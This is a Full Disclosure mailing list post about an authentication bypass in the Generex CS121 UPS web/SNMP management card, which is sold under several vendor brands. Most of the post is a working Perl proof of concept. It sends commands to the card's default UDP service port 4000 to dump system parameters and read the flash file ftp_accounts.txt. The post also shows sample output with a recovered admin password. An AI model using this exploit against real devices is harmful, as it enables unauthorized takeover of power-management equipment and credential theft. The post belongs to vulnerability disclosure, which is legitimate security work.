[FD] UPS Web/SNMP-Manager CS121 authentication bypass, credentials leak, ...

[jkmac@xxxxxxxxxxxxx]

UPS Web/SNMP-Manager CS121 by Generex comes in with a default enabled 
"service"-port, that makes it possible to bypass any specified login for 
HTTP(s), snmp or telnet. 

CS121 is a widely used management card in ups systems from Legrand, Rittal, 
Eaton,  AEG, Masterguard....

Attached is a poc, found and proofed on Legrand ups with different firmware 
releases. If you are hardcore enough, you may also flash your own 
HyNetOS-firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

#!/usr/bin/perl -w
use IO::Socket;      
use constant MAXBYTES => scalar 1024;      

$socket = IO::Socket::INET->new( PeerPort  => 4000,
                                 PeerAddr  => $ARGV[0],
                                 Type      => SOCK_DGRAM,
                                 Proto     => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n"; 

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ; 
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt"); 

while($socket->recv($inline, MAXBYTES)) { 
         if($inline =~ /admin/ig) { print $inline; exit;  }
}

sleep(1);

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/